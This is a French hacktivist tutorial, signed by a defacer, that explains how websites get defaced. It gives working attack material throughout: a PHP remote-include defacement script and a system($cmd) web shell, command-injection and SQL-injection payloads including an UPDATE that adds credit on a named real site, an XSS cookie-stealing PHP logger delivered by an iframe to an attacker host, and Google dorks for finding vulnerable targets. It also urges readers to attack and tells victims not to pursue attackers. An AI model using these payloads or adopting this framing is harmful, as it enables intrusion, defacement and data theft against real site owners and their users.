Avenir
     Géopolitique

Vulnérabilités courantes

Des sites sont référenciés chaque jour par milliers sur le portail zone-h ou sur d’autres serveurs de référencement de tout type d’attaques sur le web. Ceux qui suivent ce qui se passe de près, et qui voient les personnes actives sur ces defaced sans comprendre comment les «hackers» ou «crasheurs» y parviennent, et comment ils peuvent faire autant de dégâts en si peu de temps, sont souvent perturbés par leur incompréhension du fait, alors dans ce qui va suivre je vais essayer de vous en parler, et de vous expliquer le plus simplement possible comment ça se passe et pourquoi cela se passe ainsi.

Sommaire

I Les defaceurs

II Je veux pirater le monde

1 j’ai besoin de

2 je risque de (Au Maroc)

3 et après

III Je me suis fait piraté

1 pourquoi

2 par qui

IV Esprit mort est ce que tu m’entends :-)

I Les defaceurs

Il faut toujours distinguer ce qui est bon et ce qui ne l’est pas, ce qui est juste et ce qui ne l’est pas, et dans certains cas il faut aussi le crier, et dire au monde entier qu’on est pas d’accord pour tel ou tel acte, qu’on veut que ça change et que ça progresse. Mais nous ne sommes ni rois / reines ni hautes personnalités, nos paroles dans des journaux seront bien évidemment censurées, on n’acceptera pas de nous faire passer à la télé pour dire tout ce qui nous tracasse. Alors ce qu’on fait, en tant qu’hacktivstes, c’est envahir le Net, nous sommes les maîtres à bord, [ :) ] nous pouvons faire passer nos messages quand on le veut, comme on le veut et là ou on le veut, sans censure, sans crainte, personne ne peut plus nous arrêter nous sommes trop forts. Tellement forts qu’on a attiré une foule de personnes, qui n’ont aucun message à passer, des individus qui ne sont pas du tout concernés par notre cause, ils n’ont pas de cause ils ont tout simplement été attirés par le bruit que nous faisons, ils veulent faire autant de bruit et nous ressembler mais ils le font mal, trop mal.

Nous on attaquait des sites pour vous dire qu’il se passe de mauvaises choses sur terre, qu’il n’y a plus de justice ! On pirate les sites qu’on veut, lorsqu’on le veut, choisis parce que ces derniers ne sont pas propres à la bonne respectabilité et la liberté du Web des sites pédophiles, racistes), parfois on le fait sur des sites Web ordinaires sur lesquelles on a trouvé une faille parce que ces derniers refusent de comprendre qu’ils sont vulnérables et peuvent êtres dangereux pour le respect des informations personnelles de leurs membres inscrits et refusent notre aide, et qu’en en plus de cela ils nous insultent et traitent de délinquants, c’est pour cela qu’on les pirate, juste pour leur prouver qu’ils ont tort. Les crasheurs, ceux qui ont été attirés par notre démarche, piratent des sites, parfois des serveurs, mais ils le font sans discernement, ils ne defacent pas selon une règle et une éthique comme on le faisait, mais ils piratent ce qu’ils peuvent, ce qu’ils trouvent, à l’aveugle, ils n’ont pas de message précis à faire passer, pas d’idée à défendre.

Toi, indifférent qui regardes ces defaced, tu te dis que ces personnes là sont sûrement fortes pour pouvoir faire autant de piraterie en ci peu de temps, et que tu ne pourras jamais égaler de tels exploits, détrompe toi, tu le peux, tu peux même faire mieux / pire ! Et ce qui suit qui s’adresse et au lecteur intéressé par comprendre et au «crasheur» qui se prend pour le roi du Net, va montrer avec quelles méthodes:

II Je veux pirater le monde

1 j’ai besoin de:

Ce dont t’as surtout besoin, c’est de savoir taper sur ton clavier, savoir compiler des sources en c /perl /, tu sais chercher sur le web, manier un peu les systèmes Unix, des failles comme il en existe partout, c’est tout, tu n’as besoin de rien de plus, même plus besoin de savoir programmer sous différents langages, plus besoin de parler différentes langues, tu n’as plus besoin de créer toi-même tes outils d’audits, plus la peine de passer des heures devant ton écran à attendre que l’administrateur du serveur ciblé se connecte sur son compte pour pouvoir snifer son id. Non, plus besoin de tout cela. Tu pourras écrire de beaux defaced, attirants, digne d’un pro comme toi, du genre:

«Free Palestine»

«Greetz: Tes Zamis».

(Comme quoi tu es aussi intéressé par cette cause, je sais que tu n’en a rien à faire, mais c’est juste pour paraître plus pro)

Et qui veut dire: Je pirate ce que je veux, en fait: Tu pirates ce que tu peux !!!

Et voila c’est tout ce que tu dois savoir écrire pour accéder à la gloire, même plus la peine de coder une page en html /php /js, pour montrer ton defaced un simple .txt suffit !

Les Failles les plus courantes et plus faciles à exploiter

La php inlcude:

Cette faille est tirée de la fonction système include(), celle ci permet normalement d’inclure un fichier ou autre, dans la page ou est écrit le «include», cette variable est appelée via l’url sous la forme suivante par exemple:

http://www.target.org/index.php?var=page1.php

ce lien a pour effet de charger la page «page1.php» sur index.php grâce à la variable d’appel «var».

L’erreur consiste dans le fait que ce qui est inclus par la variable sur la page en cours, ne sera pas filtré, et ne sera pas vérifié par un script qui examine si le fichier demandé par le «var» existe réellement sur le site, ou qu’il ne doit pas être accessible par n’importe qui !!!

Un utilisateur malveillant utilisera cette brèche pour inclure sur le site ciblé, un script qu’il a lui-même créé, un script qu’il a trouvé sur le web, ou tout simplement un fichier normalement accessible juste au webmaster par exemple.

Ce qu’il fait faire: trouver le script php, le placer sur un hébergeur, tester sur des sites en php, avec une variable d’appel, genre, var=, inc=,page=,id=, bref les exemples sont nombreux, et pour trouver des liens afin de tester votre exploit / php, rendez vous sur google, allinurl: index.php ?var=, après le ver exploitant une des nombreuses faille php, google a filtré son moteur de recherche, donc tu n’auras plus qu’à faire ainsi; allinurl: index.p* ?var=, et voila, simple non.

Bon une fois le site lancé, mettez après la variable un site de votre choix, genre:

www.site.com/index.php?var=http://www.avenir-geopolitique.net,

si vous avez notre site qui s’ouvre au milieu de la page index du site, c’est que c’est peut être un site faillible. Passez ensuite au test de votre exemple, même technique:

http://www.site.com/index.php ?var=http://serveurgratuit.com/votrexploit.php

N.B: les exploits écrits pour ce bug sont nombreux, et peuvent être hébergés en .html, c’est la même chose;

http://www.site.com/index.php?var=http://hebergeurgratuit.com/votrexploit.html

Je vous présente dans ce qui suit deux backdoor / exploits créés et utilisés pour cette faille:

<?

$fp=fopen("index.php", w);

$msg="defaced,hacked,rooted,tested,loled,bref ce que tu veux";

fwrite($fp,$msg);

fclose($fp);

?>

Explication:

Au fait je ne suis pas un pro du php, mais bon c’est assez simple comme script, on ouvre le script par « < ? », la variable système fp (enfin je crois, lol) charge la page index.php.

la variable msg sauvegarde le message entré, entre parenthèses, le fwrite ajoute / remplace le contenu de $fp qui est «index.php» par celui du $msg qui est «defaced,hacked,etc...».

on referme la fonction fp (je crois qu’on peut laisser tomber le fclose($fp) ), et pour finir on referme le script par « ?> ».

Simple non !

Au fait n’oubliez pas qu’un topic a été créé sur notre Forum A-G spécialement pour cet article. Vos suggestions et remarques seront les bienvenus !

< ?

system($cmd);

?>

Avec cette ligne on ouvre comme un prompt de commande php, sur la page ou on a inclus ce script, via l’url de la page vulnérable, après il ne reste plus qu’à lancer nos commandes préférées, un simple l -l pour commencer peut être !

Exemples de l’utilisation du php include

Test avec google:

Test avec l’exploit:

Test de l’une des options de l’exploit:

Certains sites après avoir subis une attaque de ce même type, ripostent de façon intelligente et ne vont pas chercher à faire du bruit à propos de celui ou celle qui les a piraté. Mais cherchent plutôt à corriger leur faille et à sécuriser leur site. Un exemple à suivre.

P.S: le poste que j’utilise pour mes tests on-line, n’est pas le mien, c’est pour cela que vous avez un combo win98 ie 6.*.

Escape Shell:

L’Escape Shell est un terme désignant la possibilité de sortir sur un Shell via une simple url, la possibilité d’utiliser un script sur le site cible autrement de ce que l’Admin avait prévu. En effet on peut trouver ce bug sur différents types de langages de programmation, mais là on va voir cela sur le web, plus précisément sur des sites utilisant php, dans ce cas on peut dire que c’est presque la même chose qu’un include, pfff ! c’est toujours une question de mauvais scripting, sauf qu’en include, pour pouvoir lancer des cmd sur le serveur victime, on doit d’abord uploader ou juste inclure sur celui ci une backdoor temporaire, tandis que pour notre vulnérabilité, il suffit de taper les commandes.

Bon imaginons là qu’on a un site sur lequel l’administrateur a négligemment inclus une variable cmd dans le script de la page php, sous cette forme:

<?

system($cmd);

?>

Celle-ci est vraiment mal configurée, puisqu’elle ne porte aucun filtre de restriction, accessible depuis par exemple: http://www.avenir-geopolitique/index.php?cmd=[commande], on peut mettre sur la partie [commande] ce qu’on veut faire faire au serveur, puisqu‘on a entre les main un Shell en droit ‘Admin’.

On peut tout aussi facilement créer notre escape shell, exemple:

<?

echo system("coucou");

?>

Ce script permet d’afficher le mot «coucou», on peut cependant détourner system(), à l’aide des caractères spéciaux, qui sont ignorés, ou plutôt dit: pas filtrés, exemple:

http://forums.avenir-geopolitique.net/index.php?coucou | who

Le caractère | ne serait pas filtré, et ainsi on recevrait comme résultat à cette requête, les utilisateurs connectés sur le shell.

Attention de nos jours il se fait de plus en plus rare de trouver des «httpd en mode root» donc on aura peut être accès, mais pas complet (pas root). Ce qui implique qu’il ne vous reste dans ce cas qu’à penser à être le plus créatif possible avec vos cmd ;)

SQL injection:

Cette méthode est tellement simple, tellement efficace et tellement dangereuse, puisque en même pas une phrase tu peux planter tout un serveur tournant avec l’une des applications SQL faillibles !

Comment exploiter cette faille, rien de plus simple, il suffit de retrouver un site avec une authentification asp/php/… mais asp de préférence ;), parce qu’il sont les plus présents sur le web, les plus vulnérables et surtout les plus faciles à patcher, et pourtant !

Dans les cases réservées au nom d’utilisateur et mot de passe, il suffit de rentrer une des cmd offerte gracieusement par le même système qui gère les connexions aux bases de données, c’est étonnant comme quoi le système offre lui-même les techniques pour le mettre à nu !

Quelques commandes avec ou sans explication, on s’en fiche puisque ce n’est que de l’initiation:

‘Or’ ‘=’

si rien ou rien est égal à rien, accepter la requête (n’empêche que c’est tout bête quand on y pense vraiment)

'b' BETWEEN 'a' AND 'c'

si la lettre b est entre les lettres a et c, laisser passer la commande (là c’est vraiment débile !)

NULL IS NULL

' OR 'a'='a

N.B: En utilisant ces requêtes, on a souvent accès au premier enregistrement sur une table de données sql, et c’est normalement le compte admin qui occupe le premier enregistrement !

Autant de commande qu’on peut imaginer, toujours rien que pour accéder à un compte existant sur la table SQL qu’utilise le site. Mais cependant on peut utiliser d’autres commandes qui touchent à la sûreté du serveur SQL entier ?

Comme l’exemple qui a été testé sur le site d’sms et autres services téléphoniques:http://www.yepcell.com,

très interessant d’ailleurs puisque la requête lancée par le pirate consiste à recharger le compte de l’un des clients de ce site !

‘ UPDATE epCell_membresDB set Credits = 100 where UserID=’yamakasi’

assez beau quand on sait que normalement on doit payer pour avoir plus de solde et pouvoir par la suite envoyer des sms !

Cette requête en langage courant veut dire, mettre à jour la table/base de données, en ajustant le crédit à 100, quand l’utilisateur a comme id yamakasi.

Mais avant de pouvoir lancer cette commande, le pirate a dû provoquer quelques erreurs pour avoir une réponse ERROR du serveur en question avec le nom de la table utilisée !

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Column

'YepCell_membersDB.UserID' is invalid in the select list because it

is not contained in an aggregate function and there is no GROUP

BY clause.

Dans un autre exemple sur un site qui utilise le combo php/sql, tu peux avoir un script pareil:

<?

print("<center><u>MySQL infos</u></center>\n\nServeur: $Mac \nLogin: $Uti \nPass: $Mot \nDB Name: $Bd");

?>

Qui renvoie le nom de la base de données, un id utilisateur, un mot de passe, et le serveur sur lequel tourne l’application SQL !

Pour trouver des sites utilisant cette authentification, il suffit de se rendre sur google, et mettre comme thème de recherche: allinurl: login.asp

Le css ou Xss: (cross site scripting)

Réside dans le fait que l’on peut faire faire au site, mais juste en action temporaire et juste sur notre propre machine, des commandes js, ou autres dans certains cas. La plupart des utilisateurs qui tombent sur ce type de faille, et savent un peu ce que c’est, lancent toujours la même requête (j’en fais partie de ces gens d’ailleurs):

<script>alert(document.cookie)</script> 

traduit en langage courant: créer une petite alerte sous forme de boite de dialogue avec comme contenu la valeur du dernier cookie stocké sur le site, ou comme la plupart du temps, par défaut celle de celui même qui teste la faille. On peut si on veut nous amuser à faire des screenshot sur des sites vulnérables au XSS, après avoir modifié le titre ou autre partie du site en question:

C’est vrai que ça a l’air assez anodin pour un des bugs les plus présents et les plus utilisés sur le net. Détrompez vous, on peut avec juste un peu de malice (  ) obtenir des informations assez importantes. Imaginez que le webmail de votre cible souffre d’une telle faille, il est alors possible d’utiliser cette technique pour obtenir jusqu’au mot de passe de votre cible.

Exemple scripting:

< ?

$date =samedi 28 mai 2005 - 09:14:59

$heure =strftime(« %h :%m :% ») ;

$proxy = $HTTP_X_FORWARDED_FOR;

$agent = $HTTP_USER_AGENT;

$ip = $REMOTE_ADDR;

$host =@gethostbyaddr($REMOTE_ADDR);

$protocole =@getServByName(“FTP”, “TCP”);

$port =@getServByPort(80, “TCP”);

$referer = $HTTP_REFERER;

$ligne=”

Connexion_serveur :

Date : $date

Heure : $Heure

Adresse IP : $ip

Host : $host

Agent : $agent

Proxy : $proxy

Protocole : $protocole

Port : $port

Lien : $referer”;

$fd=@fopen(« cookie.txt », « a+ ») ;

If ( !$fp) die(« Unpiratable lol ») ;

Fwrite($fd,$ligne) ;

Fclose($fd) ;

?>

Ce script se charge de voler un nombre important d’informations sur la victime, genre son adresse ip, son host (bipbip.blabla.net.ma), et au passage le lien qu’il a utilisé après authentification à son webmail, avec juste un peu de chance, on peut en utilisant l’adresse url fourni par notre script php, tomber directement dans la boite au lettre de la cible !

Pour utiliser ce script il suffit de le mettre sur un hébergeur acceptant le php, puis d’envoyer un email en html à la victime, inscrite sur le webmail vulnérable, avec une iframe (on peut rediriger la page en entier avec du js, ou html, mais en iframe ça passe presque inaperçu), exemple:

Dans le corps du message en html;

<iframe src= "http://votre_hebergeur.gov/script.php"></iframe>

On peut tout aussi bien avec juste un peu de technique, utiliser le cookie volé au serveur pour avoir la page qu’aurait en visualisation normalement un utilisateur privilégié sur le site:

Et voila le tour est joué, ça reste assez simple, quand même !

Google:

Une seule adresse à connaître http://johnny.ihackstuff.com/, l’auteur du site a référencé la plupart des commandes dérivées de google, qui vous permettent des résultats très intéressants. Genre il suffit de mettre comme thème de recherche: "Welcome to PHP-Nuke" congratulations pour pouvoir retrouver facilement des sites/portails php, qui viennent d’installer leur système postnuke CMS system, et avec un peu de chance, lors d’une première installation le webmaster oublie que la configuration est par défaut, et ce dernier a oublié de mettre un mot passe, donc tu auras le rang de l’administrateur !

Trop simple, Non !

Autre exemple:

Allinurl: admin.php, tu peux aisément tomber sur une page pour la configuration d’un site….

Aussi lorsqu’on connaît bien la méthode SQL injection, on sait qu’on est «obligé» de passer par google, allinurl : admin.asp, et voila des tonnes et des tonnes de sites sur lesquels tu pourras aisément tester tes requêtes SQL préférées !

Le plus intéressant encore, c’est que dans certains cas, il ne te faut que trouver une url, et y changer un terme ou quelques valeurs, comme le cas des différentes failles découvertes sur les différents forums en php !

Bref les exemples sont nombreux, vous trouverez « toutes » celles-ci sur le site de: Johnny i hack stuff.

Divers:

Encore plus simple: il existe de nos jours des outils qui automatisent tout cela, la recherche sur une plage d’ip ou d’adresses web de failles courantes à exploiter, tester celles-ci, mettre le tout dans un rapport et attendre sagement le retour du pirate, qui n’aura plus qu’à choisir sa petite signature !

Exemple du IIS_Owned, qui en plus de scanner et référencier les sites qui peuvent être rooter, te permet à l’aide d’une simple touche de passer en maître ultime (root) sur la machine vulnérable !

La faille webdave, qui permet à un utilisateur malveillant de faire planter sa victime, ou de lancer un code arbitraire sur celle-ci, tout cela est simple à réaliser grâce aux outils KAht, ou encors ntdll.dll/WebDAV exploit.

Les exemples sont nombreux !

Scanning des ports:

Cette méthode est selon moi la plus professionnelle, c’est la plus délicate à effectuer sans parler bien sûr Du Ddos, et c’est celle qui demande le plus de patience et le plus de temps, (sans pour autant oublier le Brute forcing lol). Je vais utiliser pour mon scan l’outil Nmap et pour ne pas compromettre la légalité de mes actions et de ceux de ma team, j’ai installé certains paquetages de serveurs sur ma machine, pour que je puisse vous tester tout cela en local.

Donc on va lancer ce scanner sur l’adresse 127.0.0.1 (par défaut celle du localhost pour ceux qui ne l’auraient pas compris lol)

Comme vous pouvez le constater sur l’image, notre cible a plusieurs serveurs actifs, plein de ports ouverts et potentiellement pleins de vulnérabilités, une fois qu’on a les port et services actifs sur la machine, on peut essayer d’avoir la version exacte du programme en cours, qu’on va essayer d’utiliser pour notre piratage.

Avec ce même outil on peut avoir la version exacte du système d’exploitation utilisé par notre cible, mais pour cela il faut lancer le scanner en mode root.

N.B: beaucoup d’efforts ont été donnés pour pouvoir utiliser Nmap en simple utilisateur sur la totalité de ces options, mais il te faut toujours passer en mode root, pour pouvoir exécuter des scans un peu plus avancés.

Deux secondes je passe en uid=0 !

Comme constaté sur l’image, l’une des premières choses qui va attirer le pirate est le système d’exploitation utilisé par sa victime, dans notre cas un système linux tournant sur un Kernel version 2.4.0, le pirate va chercher s’il existe des instabilités sur cette version linux, il va essayer de s’attaquer au Kernel, normalement avec ce type d’approche, l’exploit le plus courant est celui d’un Ddos.

Sinon, et c’est justement le but de lancer ce type de scan, le pirate va se pencher sur les ports ouverts de la machine, voir les services qui peuvent lui représenter un intérêt, genre ssh, smtp, ftp…comme vous pouvez le voir sur l’image en haut, la plupart des ports de ma machine sont «open» (faut dire que je ne suis pas secure du tout lol), on a trois types de résultats sur les ports d’une machine, open, comme dans notre exemple, closed, existe mais fermé par le hote distant, ou encor firewaled, ce qui veut dire bien sûr port actif avec un firewal en prime 

Pour avoir la version du programme, il suffit de lancer un telnet sur le port spécifié et attendre la réponse du serveur, comme sur l’image pour le port 22.

Sur ma machine j’utilise une OpenSSh version 3.6.*, imaginons que ma machine soit la cible à pirater, il ne te reste plus qu’à trouver un exploit qui peut t’obtenir un accès root sur le service OpenSSh tournant sur le port 22, simple non ??

Pour le fun, j’ai activé le service smtp sur ma machine, pour vous rappeler des envois de mails «anonymes;» en smtp.

Une fois les ports ouverts détectés, avec les versions des processus tournant dessus, le pirate va essayer de trouver une faille sur ces derniers, ne croyez pas qu’il va télécharger le service en question, l’installer chez lui et commencer à étudier son processus et son code source s’il est disponible. Pas du tout, le pirate n’aura plus qu’à chercher sur le web l’exploit adéquat au protocole qu’il va essayer de compromettre, en plus de cela, certains defaceurs ne savent même pas ce que fait tel ou tel exploit, la façon dont ce dernier obtient le id root, et encore moins si ce dernier doit être lancé en local ou bien à distance.

Et oui c’est ça le Net !

Pour chaque faille, il existe des exploits déjà prêts, tu n’as qu’à chercher sur ton moteur de recherche préféré ceux dont tu as besoin, il y a également pleins de sites qui se spécialisent dans le domaine de ce type d’exploits:

http://packetstorm.widexs.nl/

http://packetstorm.linuxsecurity.com/

http://packetstormsecurity.org/

http://www.c-schell.de/?action=exploits

http://www.securityfocus.net

http://www.phreak.org/html/exploits.shtml

http://zhodiac.net-dreamer.net/

…

Sinon tu peux toujours te référer au grand google, avec comme thème de recherche allinurl: exploitdetellebug.c, exemple: allinurl: flood.c

Une fois l’exploit entre tes mains, il ne te reste plus qu’à le compiler, pour cela tu auras besoin d’un Shell avec la fonction gcc (avec les plus importantes Lib installées dessus), sinon si t’as ton système Unix perso (mandrake, redhat, debian,….) tu peux lancer un terminal comme on voit sur les images qui suivent, te diriger vers le dossier ou se trouve ton exploit en c ou autre, et faire comme ce qui suit:

J’ai lancé la cmd: l–o *.c, qui veut dire dir tout les fichier qui finissent par .c avec leur droits. (C’est juste pour un petit plus)

Une fois l’exploit recherché trouvé, il ne reste plus qu’à le compiler avec gcc, compilateur propre aux systèmes Unix, la commande est la suivante: gcc –o lenomquetuveuxdonneràlxploit lxploit.c

Une fois l’exploit compilé il ne te reste plus qu’à le lancer: /lenomquetuasdonnéàlexploit, comme indiqué sur l’image en haut !

Maintenant tu peux tester l’exploit sur la machine potentiellement vulnérable comme sur l’image en dessus !

Attention nombre d’exploits disponibles sur le web sont mal codés et sont presque inutilisables ;

Si ton exploit marche, tu as normalement un message du genre, connexion etablished, ou bien id=0, ou encor rooted, là il ne reste plus qu’à te diriger vers le dossier contenant les fichiers qui t’intéressent, pour un defaceur ce sera directement: /home/Nomdusite/public_html.

2 je risque de:

Dans les autres pays il faut se référer à la législation en place, je vous donne ce qui est en vigueur au Maroc, je ne suis pas encore sûr de la situation, je sais seulement qu’on a une loi qui traite des actions de piratage, elle a été mise en vigueur il y un petit bout de temps, et depuis nous n’avons vu que trop peu de cas d’arrestation dans le domaine du defaced ou du crack des programmes, ou l’intrusion sur des réseaux et serveurs locaux ou étrangers.

Voila ce qu’ont peut trouver dans les publications marocaines à propos d’une loi traitant des crimes informatiques:

« L'atteinte aux réseaux informatisés des données sera sévèrement sanctionnée par la législation marocaine. Un projet de loi complétant le code pénal qui fixe une procédure spéciale est soumis à l'examen au sein de la commission de la justice, de la législation et des droits de l'homme à la chambre des représentants. Il sera la plate-forme juridique des tribunaux compétents pour statuer sur les infractions commises au niveau des systèmes informatiques

Des amendements seront apportés avant le 19 février. Le texte sera par la suite programmé en séance plénière au cours de la session extraordinaire du parlement.

Lors de sa dernière sortie, le premier ministre, Driss Jettou, avait souligné l'importance du projet qui comblera le vide juridique prévalant en la matière. Driss Jettou a demandé aux membres de la commission d'activer l'examen du projet pour le faire sortir le plus rapidement possible. Objectif: renforcer et encadrer l'action gouvernementale dans sa lutte contre le piratage informatique et combler les lacunes du code pénal. Le Maroc est un terrain fécond pour les génies du piratage des logiciels, et le décodage des systèmes TPS avec un taux de piratage qui dépasse les 60% des produit vendus, la preuve en est la multiplicité des points de vente des produits piratés dont les plus connus se situent à derb Ghallef à Casablanca ou Lagza à rabat, c'est pour couper court avec ces pratiques malveillantes que le législateur marocain a mis en place un arsenal de dispositions réprimant le piratage, ainsi les nouvelle dispositions complétant le code pénal sont sévères six mois d'emprisonnement et une amende allant de 5000 à 20000 dh pour toute personne ayant accédé ou s'étant maintenue, frauduleusement, dans le système de traitement automatisé de données de n'importe quel établissement. Et en cas de modification de données contenues dans le système, aboutissant à l'altération de son fonctionnement, la loi prévoit deux ans d'emprisonnement et une amende allant de 50000 à 500000 dh.

La nouvelle législation punira aussi de deux à dix ans de réclusion et une amende allant de 50000 à 200000 dh, toute personne ayant conçu des systèmes d'exploitation, notamment des serveurs de logiciels pour les utiliser comme instruments et programmes informatiques dans le but de pirater. On outre le fait d'entraver ou de fausser intentionnellement le fonctionnement d'un système de traitement automatisé est puni de 2 à 5 ans d'emprisonnement et une amande allant de 50000 à 1000000 dh, ou l'une de ces deux peines. Sur un autre plan, le fait d'introduire des données dans un système de traitement automatisé, de supprimer ou modifier frauduleusement des données dans ce système, sera condamné de trois à cinq ans d'emprisonnement et une amande variant entre 50000 et 200000 dh. Même la falsification de documents informatisés de nature être préjudiciable pour autrui est punie par un emprisonnement de 2 à 10 ans et une amende variant entre 100000 et 1000000 de dh ».

3 et après:

Apres ? Tu pourras devenir connu, parfois craint sur le web, on parlera de toi un peu de partout, on dira que tu es bon, ou que tu es idiot, que tu cherches la prison, on dira même que tu es un groupe et non pas une seule personne. Tu recevras des mails de demande d’aide, des mails d’estime et des mails d’insultes. Le tout mélangé !

On va t’inviter à faire des interviews, à faire partie d’une Team de «hackers» par rapport à ton niveau, ou on te demandera d’écrire des tutoriaux pour des sites de sécurité informatique.

A ton propos tu trouveras sur le web des trucs un peu comme ce qui va suivre, qui font plaisir parfois, et qui vous font mal d’autres fois, mais c’est ça être «pirate»: Etre incompris dans ses actions.

«Le site des Supporters du Grand RAJA a encore une fois été hacké par les mêmes délinquants de notre football national. Ceux qui voient rouge et perdent les pédales chaque fois que d'autres réussissent. L’attaque a eu lieu quelques heures seulement après la fin du match du derby casablancais qui a vu le Raja battre son adversaire du jour le wac 2-0. Ces énergumènes se targuent sur les terrasses des cafés de Casa de leur méfait abjecte et indicateur de leur vraie nature de salopards et de criminels à la solde de ceux qui travaillent forts pour devenir les dirigeants de demain du club que vous connaissez tous. Ces derniers font honte à tous les sportifs et dire qu'ils ont aussi porté leur poisse à Maroc 2010 aussi. Là ou ils passent ils laissent les empreintes indélébiles des opportunistes qui méritent la poubelle de l'histoire».

«13-01-2005 - Le site de Guinéenews©, le portail électronique guinéen sur Internet, est encore une fois victime de sa popularité avec une nouvelle attaque par un cyberterroriste appelés "hackers". Nos techniciens travaillent sur cette dernière attaque. Heureusement que pour le moment aucun fichier n'a été touché comme la dernière fois».

Ou bien...

«Dear sn0oPy's Team

* PLEASE STOP THIS NONSENSE - TAKE YOUR PROTEST TO AN AMERICAN SITE AND LEAVE

* US TO GO ABOUT OUR BUSINESS UNDISTURBED.

* Well done - I know you are very clever but your nonsense only overloads the bandwidth which is limited in my country and you cause irritation to our customers. Enough now. Thank you.”

“Some "real hacker" hit our wiki yesterday. He is soo "l33t" he signed it "sn0oPy from morroco" (which isn't even how you spell Morocco) over and over and over. It must be really cool to show off that he was able to vandalize a site that requires no effort at all. He replaced the main page with what looked like political views of a pre-teen, written with all the finesse of a 5 year old repeated a bunch of times. English was definatly not his native language. Traceroute says this looser is from Amsterdam. It was caught really quickly; it stayed up a whole 15 minutes.”

N.B: MDR je n’ai jamais fait plus de 300 KM loin de chez moi, et eux ils me trouvent à Amsterdam, ils sont forts !

Et c’est tout ce que tu récoltes, je ne suis pas pessimiste, mais entre nous je ne crois pas que nos actions sur certains serveurs web ont changé ou vont changer quelque chose à la cause que nous défendions: celle de la Palestine, celle de la liberté d’expression, celle d’arrêter la guerre de par le monde, on n’a rien changé. Il faut s’avouer quand même que ce n’est pas en defaçant des sites qu’on se fera entendre par ceux qui nous intéressent, et les concernés en Palestine ne sont même pas au courant qu’il y a des gens qui risquent leur liberté pour crier au monde leur souffrance et que l’on vienne à leur secours, ils ne savent même pas qu’on existe.

Tout le monde sait que Bush et Sharon sont des criminels, mais est-ce que c’est parce qu’on a vu cela sur la page défigurée d’un site piraté ? Non pas du tout, alors pourquoi on a fait cela, et pourquoi d’autres continuent de le faire ?

Très simple, parce qu’on l’a pu, et parce qu’on le peut toujours ! Et que c’est une action de plus pour la liberté ! C‘est notre contribution.

III Je me suis fait piraté

1 pourquoi:

Cette fois ci on se trouve de l’autre coté de l’action, en victime de pirates: j’ai un site web qui s’est fait en peu de temps complètement dévisager, c’est malheureux c’est vrai, mais c’est surtout de notre propre faute si on se fait si facilement pirater.

Lorsqu‘on utilise un programme quelconque sur notre serveur, ou n’importe quel codage, on doit toujours veiller à la sûreté de celui-ci, on doit se mettre dans la peau du pirate, lui il cherche comment passer par tel processus, l’administrateur doit chercher aussi la même chose pour savoir ce qu’il doit sécuriser et comment il doit le faire.

Il y a chaque jour un tas de patch qui sont mis à jour pour corriger des failles, mais les webmasters y prêtent rarement attention, et c’est la seule cause de leur perte, c’est pour cela que je dis qu’il ne faut pas juger trop vite les pirates, ils ne font qu’emprunter des portes ouvertes ! A nous de les fermer.

À retenir:

- La sécurité n’est pas seulement un problème pour les systèmes Multi-Utilisateurs, tout système peut contenir des programmes contenant eux-mêmes des chevaux de Troie.

- Les erreurs des administrateurs ne sont pas toutes intentionnelles, elles sont plutôt le fait de négligences ou manque de connaissances, mais les effets de ces erreurs peuvent néanmoins être graves.

- Un PC est particulièrement sensible aux virus puisque l’utilisateur s’occupe lui-même de l’installation de logiciels sur sa machine. Or un utilisateur récupère beaucoup de ses programmes sur un site Web et ne sait pas ce qu’il télécharge.

- Les systèmes Unix sont mieux protégés de ce point de vue.

- Les firewalls, peuvent être un bon moyen à fin de se sentir potentiellement à l’abri.

- Il n’y aucun programme qui soit invulnérable.

2 par qui:

N’y pensez pas maintenant, ça ne vous fera que plus de mal, surtout lorsque vous découvrirez que celui qui a mis toute votre infrastructure à nu, n’a que 14 ans ! Aussi soyez sympa ne cherchez pas qui c’est, contentez vous de vous dire que vous êtes négligent, et que par là vous le méritez un peu. Ceux qui vous ont piraté ne sont pas des magiciens, ils ont bien évidemment profité que votre site était mal administré, c’est de votre faute, aussi soyez indulgent. Ne demandez pas qu’on poursuive celui qui a defacé vos pages, parce qu’il mérite peut être mieux, c’est vous le vrai responsable et vous devriez le féliciter, parce qu’au contraire de ce qu’il croyait faire, il vous a plutôt mis sur la bonne voie de la sécurité. Pensez y !

IV Esprit mort est ce que tu m’entends :-)

Je serais ravi que tu arrives à cette partie en ayant lu tout ce que j’ai dis plus haut. Ne me dis pas que tu as seulement été attiré par ce titre et que tu as sauté directement vers cette 4ème partie ! Si c’est le cas, et bien esprit mort si tu m’entends, dirige toi vers le début du tutorial et prend conscience de la vulnérabilité du Web et des différences entre les actes malveillants et l’ hactivisme qui ne détruit rien, mais utilise les portes ouvertes du Net et tente d’informer et agir pour sa cause.

Note de Malicia: Sn0oPy a bien voulu, à sa façon facétieuse, nous donner de ses connaissances et sa vision très pertinente du monde du «piratage;» tel qu’il est présenté sur le Web.

Merci à lui !

sn0oPy

---